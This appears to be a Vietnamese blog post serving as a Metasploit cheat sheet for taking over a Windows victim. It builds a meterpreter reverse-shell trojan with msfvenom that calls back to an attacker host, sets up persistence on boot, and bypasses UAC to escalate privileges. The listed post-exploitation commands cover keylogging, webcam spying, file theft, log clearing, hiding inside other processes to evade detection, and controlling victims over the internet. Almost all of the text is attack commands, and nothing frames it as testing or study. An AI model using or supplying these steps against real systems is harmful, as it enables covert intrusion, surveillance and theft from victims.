- msfvenom -a x86 --platform window -f exe -p windows/meterpreter/reverse_tcp lhost=[ip] lport=[port] -o [name].exe
- -a : nền tảng
- --platform : hđh
- -f : định dạng
- -p : loại payload
- lhost : host attacker (tùy trạng thái mà dùng private hay public IP)
- lport : cổng nhận
- -o : tên
2. MSF
- service postgresql start
- msfconsole : chạy metasploit
- use exploit/multi/handler
- set payload [payload]
- set lhost [IP]
- set lport [port]
- exploit
3. Cài Auto Start
- run persistence -A -U -X -S -i 60 -r [IP] -p [port]
- -A : tự động kết nối exploit/multi/handler
- -L : vị trí lưu payload, mặc định là %TEMP%
- -P : định dạng payload, mặc định windows/meterpreter/reverse_tcp
- -S : boot like service
- -U : chạy khi user khởi động
- -X : chạy khi system khởi động
- -i : giây giữa những lần thử kết nối
- -r : IP (attacker)
- -p : port (attacker)
4. Leo thang đặc quyền (admin)
- run post/windows/gather/win_privs : xem đặc quyền
- tại "msf >"
- use exploit/windows/local/bypassuac_injection
- set session [session]
- set targets [0 = 32bit]
- run
Note: Yêu cầu đảm bảo chính xác tương thích về payload, session, x86 hay x64 (cả trojan + victim)
5. Options thông thường
- exit : thoát hẳn khỏi session
- background : trở về "msf >" nhưng không thoát session
- cd, pwd, ls : truy cập, xem đường dẫn, list trên máy victim
- lcd, lpwd : trên attacker
- show_mount : thông tin ổ đĩa
- clearev : xóa log
- download '[link]' hoặc download C:\\Users\\Admin
- upload
- edit : xem và sửa ngay trên command
- execute -f [].exe -H(hide)
- ps : hiện task
- shell : chạy cmd.exe
- keyscan_start : bắt đầu keylogger
- keyscan_dump : hiện keylog
- keyscan_stop : dừng
- screenshot
- webcam_list
- webcam_snap : chụp ảnh từ webcam
- webcam_stream : soi webcam
- migrate [pid] : cấy vào file exe khác
- run vnc -i cmd.exe : tạo exe và upload cho victim để xem desktop victim, -i : cấy vnc vào exe khác, tránh phát hiện.
6. Dùng portmap.io để điều khiển qua WAN
No comments:
Post a Comment
Sending successfully